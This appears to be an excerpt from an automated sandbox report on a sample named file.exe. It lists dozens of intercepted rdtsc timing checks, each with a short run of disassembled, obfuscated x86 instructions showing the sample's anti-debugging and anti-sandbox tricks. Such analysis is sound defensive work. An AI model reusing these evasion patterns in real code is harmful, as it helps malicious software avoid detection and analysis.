                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8C088 second address: F8C097 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007FB958B07016h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F89E93 second address: F89F31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 push eax 0x00000007 jmp 00007FB958FCD451h 0x0000000c nop 0x0000000d jno 00007FB958FCD450h 0x00000013 push dword ptr fs:[00000000h] 0x0000001a pushad 0x0000001b jno 00007FB958FCD44Ch 0x00000021 jnp 00007FB958FCD446h 0x00000027 popad 0x00000028 mov dword ptr fs:[00000000h], esp 0x0000002f push 00000000h 0x00000031 push eax 0x00000032 call 00007FB958FCD448h 0x00000037 pop eax 0x00000038 mov dword ptr [esp+04h], eax 0x0000003c add dword ptr [esp+04h], 00000016h 0x00000044 inc eax 0x00000045 push eax 0x00000046 ret 0x00000047 pop eax 0x00000048 ret 0x00000049 push ecx 0x0000004a push eax 0x0000004b pushad 0x0000004c popad 0x0000004d pop ebx 0x0000004e pop edi 0x0000004f or di, D9D5h 0x00000054 mov eax, dword ptr [ebp+122D041Dh] 0x0000005a jmp 00007FB958FCD44Ah 0x0000005f push FFFFFFFFh 0x00000061 jmp 00007FB958FCD44Dh 0x00000066 nop 0x00000067 push eax 0x00000068 push edx 0x00000069 jnp 00007FB958FCD448h 0x0000006f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F89F31 second address: F89F37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8E05A second address: F8E060 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F89F37 second address: F89F3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8E060 second address: F8E065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8C1CA second address: F8C1D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8D2A2 second address: F8D2A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F89F3B second address: F89F3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8E065 second address: F8E104 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jnp 00007FB958FCD44Eh 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007FB958FCD448h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 0000001Bh 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a push 00000000h 0x0000002c and edi, dword ptr [ebp+122D3B40h] 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push edi 0x00000037 call 00007FB958FCD448h 0x0000003c pop edi 0x0000003d mov dword ptr [esp+04h], edi 0x00000041 add dword ptr [esp+04h], 0000001Dh 0x00000049 inc edi 0x0000004a push edi 0x0000004b ret 0x0000004c pop edi 0x0000004d ret 0x0000004e add dword ptr [ebp+1244FBB3h], esi 0x00000054 mov ebx, dword ptr [ebp+122D2B19h] 0x0000005a xchg eax, esi 0x0000005b jg 00007FB958FCD45Eh 0x00000061 push eax 0x00000062 pushad 0x00000063 js 00007FB958FCD44Ch 0x00000069 push eax 0x0000006a push edx 0x0000006b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8D2A6 second address: F8D320 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007FB958B0701Ah 0x0000000c pop edx 0x0000000d popad 0x0000000e nop 0x0000000f movzx ebx, si 0x00000012 push dword ptr fs:[00000000h] 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007FB958B07018h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 0000001Ah 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 call 00007FB958B0701Ah 0x00000038 cld 0x00000039 pop ebx 0x0000003a mov dword ptr fs:[00000000h], esp 0x00000041 mov edi, ecx 0x00000043 mov eax, dword ptr [ebp+122D141Dh] 0x00000049 xor edi, 46369CA7h 0x0000004f push FFFFFFFFh 0x00000051 mov edi, dword ptr [ebp+122D3A38h] 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007FB958B0701Eh 0x0000005f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8C285 second address: F8C289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8F0C8 second address: F8F0E8 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FB958B07016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB958B07024h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8F352 second address: F8F3F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push esi 0x00000007 jnp 00007FB958FCD44Ch 0x0000000d jl 00007FB958FCD446h 0x00000013 pop esi 0x00000014 nop 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007FB958FCD448h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f push dword ptr fs:[00000000h] 0x00000036 adc edi, 622F91B5h 0x0000003c mov dword ptr fs:[00000000h], esp 0x00000043 je 00007FB958FCD44Bh 0x00000049 mov ebx, 1A17A884h 0x0000004e mov eax, dword ptr [ebp+122D1021h] 0x00000054 mov dword ptr [ebp+122D28B7h], ebx 0x0000005a push FFFFFFFFh 0x0000005c push 00000000h 0x0000005e push eax 0x0000005f call 00007FB958FCD448h 0x00000064 pop eax 0x00000065 mov dword ptr [esp+04h], eax 0x00000069 add dword ptr [esp+04h], 0000001Dh 0x00000071 inc eax 0x00000072 push eax 0x00000073 ret 0x00000074 pop eax 0x00000075 ret 0x00000076 mov edi, eax 0x00000078 nop 0x00000079 jo 00007FB958FCD45Ch 0x0000007f push eax 0x00000080 push edx 0x00000081 jmp 00007FB958FCD44Eh 0x00000086 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8F3F7 second address: F8F407 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jo 00007FB958B0701Eh 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F910AB second address: F910AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F910AF second address: F91109 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB958B0701Ch 0x0000000b popad 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007FB958B07018h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 sub dword ptr [ebp+122D296Bh], edi 0x0000002d push 00000000h 0x0000002f add di, 9F0Bh 0x00000034 push 00000000h 0x00000036 sbb bh, 00000012h 0x00000039 xchg eax, esi 0x0000003a push ecx 0x0000003b jmp 00007FB958B0701Ah 0x00000040 pop ecx 0x00000041 push eax 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 jbe 00007FB958B07016h 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F91109 second address: F9110D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9212A second address: F92130 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F92130 second address: F92134 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F92134 second address: F92152 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB958B07022h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F921D7 second address: F921E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FB958FCD446h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F38615 second address: F38632 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB958B07025h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F932FE second address: F9339E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB958FCD451h 0x00000008 jnl 00007FB958FCD446h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp], eax 0x00000014 push 00000000h 0x00000016 push eax 0x00000017 call 00007FB958FCD448h 0x0000001c pop eax 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 add dword ptr [esp+04h], 00000016h 0x00000029 inc eax 0x0000002a push eax 0x0000002b ret 0x0000002c pop eax 0x0000002d ret 0x0000002e push dword ptr fs:[00000000h] 0x00000035 mov dword ptr fs:[00000000h], esp 0x0000003c push 00000000h 0x0000003e push edx 0x0000003f call 00007FB958FCD448h 0x00000044 pop edx 0x00000045 mov dword ptr [esp+04h], edx 0x00000049 add dword ptr [esp+04h], 00000015h 0x00000051 inc edx 0x00000052 push edx 0x00000053 ret 0x00000054 pop edx 0x00000055 ret 0x00000056 mov edi, dword ptr [ebp+122D226Eh] 0x0000005c mov edi, dword ptr [ebp+122D341Ch] 0x00000062 mov eax, dword ptr [ebp+122D04B9h] 0x00000068 add dword ptr [ebp+12448A47h], edx 0x0000006e push FFFFFFFFh 0x00000070 jns 00007FB958FCD44Eh 0x00000076 nop 0x00000077 push eax 0x00000078 push edx 0x00000079 jo 00007FB958FCD44Ch 0x0000007f jnl 00007FB958FCD446h 0x00000085 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F967B7 second address: F967D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB958B07029h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F967D9 second address: F96865 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB958FCD448h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov edi, dword ptr [ebp+122D38D8h] 0x00000011 push dword ptr fs:[00000000h] 0x00000018 sbb bx, 2CE6h 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 push 00000000h 0x00000026 push ebp 0x00000027 call 00007FB958FCD448h 0x0000002c pop ebp 0x0000002d mov dword ptr [esp+04h], ebp 0x00000031 add dword ptr [esp+04h], 00000016h 0x00000039 inc ebp 0x0000003a push ebp 0x0000003b ret 0x0000003c pop ebp 0x0000003d ret 0x0000003e jbe 00007FB958FCD446h 0x00000044 mov eax, dword ptr [ebp+122D0A91h] 0x0000004a push 00000000h 0x0000004c push ebp 0x0000004d call 00007FB958FCD448h 0x00000052 pop ebp 0x00000053 mov dword ptr [esp+04h], ebp 0x00000057 add dword ptr [esp+04h], 0000001Ch 0x0000005f inc ebp 0x00000060 push ebp 0x00000061 ret 0x00000062 pop ebp 0x00000063 ret 0x00000064 mov bx, D7E8h 0x00000068 push FFFFFFFFh 0x0000006a jp 00007FB958FCD44Ch 0x00000070 mov dword ptr [ebp+1244E75Ah], eax 0x00000076 nop 0x00000077 pushad 0x00000078 push eax 0x00000079 push edx 0x0000007a push eax 0x0000007b push edx 0x0000007c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F96865 second address: F96869 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F97722 second address: F97726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F96869 second address: F9688C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB958B0701Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FB958B0701Fh 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F99A0A second address: F99A0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F987F1 second address: F987F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9FD03 second address: F9FD1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB958FCD454h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9FD1D second address: F9FD23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9FD23 second address: F9FD2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9F403 second address: F9F433 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB958B0701Dh 0x00000008 jns 00007FB958B07016h 0x0000000e popad 0x0000000f jmp 00007FB958B07023h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push edi 0x00000017 push esi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9F433 second address: F9F439 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9F569 second address: F9F591 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jns 00007FB958B07031h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA6EA0 second address: FA6EBB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB958FCD451h 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007FB958FCD446h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA6EBB second address: FA6EEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB958B07028h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FB958B0701Dh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA8912 second address: FA8965 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007FB958FCD44Fh 0x0000000f pushad 0x00000010 jmp 00007FB958FCD459h 0x00000015 jmp 00007FB958FCD454h 0x0000001a popad 0x0000001b popad 0x0000001c mov eax, dword ptr [esp+04h] 0x00000020 push eax 0x00000021 push edx 0x00000022 push ecx 0x00000023 pushad 0x00000024 popad 0x00000025 pop ecx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA8965 second address: FA896A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA896A second address: FA8983 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007FB958FCD44Ch 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA8983 second address: FA89A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB958B0701Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jng 00007FB958B07028h 0x00000013 push eax 0x00000014 push edx 0x00000015 jbe 00007FB958B07016h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA89A3 second address: FA89A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA8A3C second address: FA8A57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB958B07026h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA8B52 second address: FA8B58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA8C35 second address: FA8C3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA8C3B second address: FA8C56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FB958FCD453h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA8C56 second address: FA8C7C instructions: 0x00000000 rdtsc 0x00000002 je 00007FB958B0701Ch 0x00000008 je 00007FB958B07016h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FB958B07020h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA8C7C second address: FA8CC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB958FCD44Ch 0x00000008 jl 00007FB958FCD446h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov eax, dword ptr [eax] 0x00000013 pushad 0x00000014 jmp 00007FB958FCD44Ch 0x00000019 jmp 00007FB958FCD44Eh 0x0000001e popad 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 jg 00007FB958FCD454h 0x00000029 push eax 0x0000002a push edx 0x0000002b js 00007FB958FCD446h 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA8CC4 second address: DD1D11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 jc 00007FB958B0702Ch 0x0000000d jmp 00007FB958B07026h 0x00000012 jmp 00007FB958B07029h 0x00000017 push dword ptr [ebp+122D142Dh] 0x0000001d jno 00007FB958B07033h 0x00000023 call dword ptr [ebp+122D1BCDh] 0x00000029 pushad 0x0000002a jmp 00007FB958B07024h 0x0000002f xor eax, eax 0x00000031 pushad 0x00000032 jbe 00007FB958B0701Ch 0x00000038 mov bx, 2835h 0x0000003c popad 0x0000003d mov edx, dword ptr [esp+28h] 0x00000041 jmp 00007FB958B0701Fh 0x00000046 mov dword ptr [ebp+122D3A7Ch], eax 0x0000004c stc 0x0000004d mov esi, 0000003Ch 0x00000052 jc 00007FB958B0701Ch 0x00000058 add esi, dword ptr [esp+24h] 0x0000005c sub dword ptr [ebp+122D3374h], ecx 0x00000062 mov dword ptr [ebp+122D2BBDh], ebx 0x00000068 lodsw 0x0000006a jmp 00007FB958B0701Ch 0x0000006f add eax, dword ptr [esp+24h] 0x00000073 stc 0x00000074 mov ebx, dword ptr [esp+24h] 0x00000078 jmp 00007FB958B0701Ch 0x0000007d nop 0x0000007e push edi 0x0000007f pushad 0x00000080 jng 00007FB958B07016h 0x00000086 jmp 00007FB958B07028h 0x0000008b popad 0x0000008c pop edi 0x0000008d push eax 0x0000008e push edx 0x0000008f push eax 0x00000090 push edx 0x00000091 jmp 00007FB958B07020h 0x00000096 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FADCB4 second address: FADCB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FACA2F second address: FACA39 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB958B07016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FACA39 second address: FACA3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FACA3E second address: FACA5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB958B07026h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAD2F3 second address: FAD2FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FB958FCD446h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAD9C4 second address: FAD9DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007FB958B0701Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB9C02 second address: FB9C21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FB958FCD455h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB9C21 second address: FB9C27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB9C27 second address: FB9C2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F409F5 second address: F409FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FB958B07016h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB8658 second address: FB868F instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB958FCD454h 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007FB958FCD44Ch 0x0000000f pushad 0x00000010 jne 00007FB958FCD446h 0x00000016 push eax 0x00000017 pop eax 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pushad 0x0000001c jl 00007FB958FCD44Eh 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB868F second address: FB8693 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB890F second address: FB8917 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB8917 second address: FB8923 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB8BED second address: FB8C21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB958FCD457h 0x00000008 jmp 00007FB958FCD458h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB8D78 second address: FB8D97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FB958B07016h 0x0000000a jmp 00007FB958B07024h 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB8F28 second address: FB8F31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB8F31 second address: FB8F35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB9038 second address: FB9055 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jmp 00007FB958FCD44Ah 0x0000000b je 00007FB958FCD446h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB91E0 second address: FB91E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
